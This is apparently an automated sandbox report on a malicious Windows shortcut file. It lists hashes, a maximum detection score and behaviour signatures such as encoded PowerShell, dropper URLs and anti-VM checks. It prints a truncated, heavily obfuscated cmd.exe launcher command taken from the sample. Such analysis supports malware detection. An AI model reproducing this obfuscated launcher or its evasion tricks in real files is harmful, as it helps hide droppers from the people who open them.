Edit tour
Windows
Analysis Report
mjjt5kTb4o.lnk
Overview
General Information
Sample name: | mjjt5kTb4o.lnkrenamed because original name is a hash value |
Original sample name: | 592a1fd0840fab1915a85c82a4c0cb2f657cbae4c99ec2dbf39bc332555cdd83.lnk |
Analysis ID: | 1576703 |
MD5: | cb553ea2e89a6cbccaac5122455bc7ef |
SHA1: | 03c64ddf6cdc5bbb82198c84709c4565768ab258 |
SHA256: | 592a1fd0840fab1915a85c82a4c0cb2f657cbae4c99ec2dbf39bc332555cdd83 |
Tags: | dacsanvinhchau-vnlnkuser-JAMESWT_MHT |
Infos: | |
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Creates HTML files with .exe extension (expired dropper behavior)
Encrypted powershell cmdline option found
Machine Learning detection for sample
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Contains functionality to detect virtual machines (SLDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Classification
- System is w10x64
- cmd.exe (PID: 6720 cmdline:
"C:\Window s\System32 \cmd.exe" "AAAAAA||S erviceRunL ocalDriveU serNotes1| |ServiceRu nLocalDriv eUserNotes 1||Service RunLocalDr iveUserNot es1||Servi ceRunLocal DriveUserN otes1||Ser viceRunLoc alDriveUse rNotes1||S erviceRunL ocalDriveU serNotes1| |ServiceRu nLocalDriv eUserNotes 1||Service RunLocalDr iveUserNot es1||Servi ceRunLocal DriveUserN otes1||/V/ D/c "Servi ceRunLocal DriveUserN otes1Servi ceRunLocal DriveUserN otes1||Ser viceRunLoc alDriveUse rNotes1||S erviceRunL ocalDriveU serNotes1| |ServiceRu nLocalDriv eUserNotes 1||Service RunLocalDr iveUserNot es1||Servi ceRunLocal DriveUserN otes1||Ser viceRunLoc alDriveUse rNotes1||S erviceRunL ocalDriveU serNotes1| |ServiceRu nLocalDriv eUserNotes 1||Service RunLocalDr iveUserNot es1||Servi ceRunLocal DriveUserN otes1||Ser viceRunLoc alDriveUse rNotes1||S erviceRunL ocalDriveU serNotes1| |OOOOOOOOO OOOOOOOOOO OOOOOOOO|| OOOOOOOOOO OOOOOOOOOO OOOOOOXXX| |ServiceRu nLocalDriv eUserNotes 1||Service RunLocalDr iveUserNot es1||Servi ceRunLocal DriveUserN otes1||Ser viceRunLoc alDriveUse rNotes1||S erviceRunL ocalDriveU serNotes1| |ServiceRu nLocalDriv eUserNotes 1||Service RunLocalDr iveUserNot es1||Servi ceRunLocal DriveUserN otes1||Ser viceRunLoc alDriveUse rNotes1||O OOOOOOOOOA AAA||Servi ceRunLocal DriveUserN otes1||Ser viceRunLoc alDriveUse rNotes1||S erviceRunL ocalDriveU serNotes1| |CCCCCCCC| |ServiceRu nLocalDriv eUserNotes 1||Service RunLocalDr iveUserNot es1||Servi ceRunLocal DriveUserN otes1||Ser viceRunLoc alDriveUse rNotes1||S erviceRunL ocalDriveU serNotes1| |ServiceRu nLocalDriv eUserNotes 1||Service RunLocalDr iveUserNot es1||Servi ceRunLocal DriveUserN otes1||Ser viceRunLoc alDriveUse rNotes1||S erviceRunL ocalDriveU serNotes1| |ServiceRu nLocalDriv eUserNotes 1||Service RunLocalDr iveUserNot es1OOOOOOO OOOOOOO||S erviceRunL ocalDriveU serNotes1| |ServiceRu nLocalDriv eUserNotes 1||Service RunLocalDr iveUserNot es1||Servi ceRunLocal DriveUserN otes1||OOO OOOOOOOAAA ||ServiceR unLocalDri veUserNote s1AA||Se^T ACAACA=:\ Helper&&Se rviceRunLo calDriveUs erNotes1|| OOOOOOOOOO AA||Servic eRunLocalD riveUserNo tes1||Serv iceRunLoca lDriveUser Notes1||Se rviceRunLo calDriveUs erNotes1|| ServiceRun LocalDrive UserNotes1 ||ServiceR unLocalDri veUserNote s1||Servic eRunLocalD riveUserNo tes1||Serv iceRunLoca lDriveUser Notes1||Se rviceRunLo calDriveUs erNotes1|| ServiceRun LocalDrive UserNotes1 ||ServiceR unLocalDri veUserNote s1||set SS A=exi&&Ser viceRunLoc alDriveUse rNotes1||@ if exist " C!ACAACA!" (!SSA!t) else ( Ser viceRunLoc alDriveUse rNotes1||S erviceRunL ocalDriveU serNotes1| |ServiceRu nLocalDriv eUserNotes 1||Service RunLocalDr iveUserNot es1||Servi ceRunLocal DriveUserN otes1||Ser viceRunLoc alDriveUse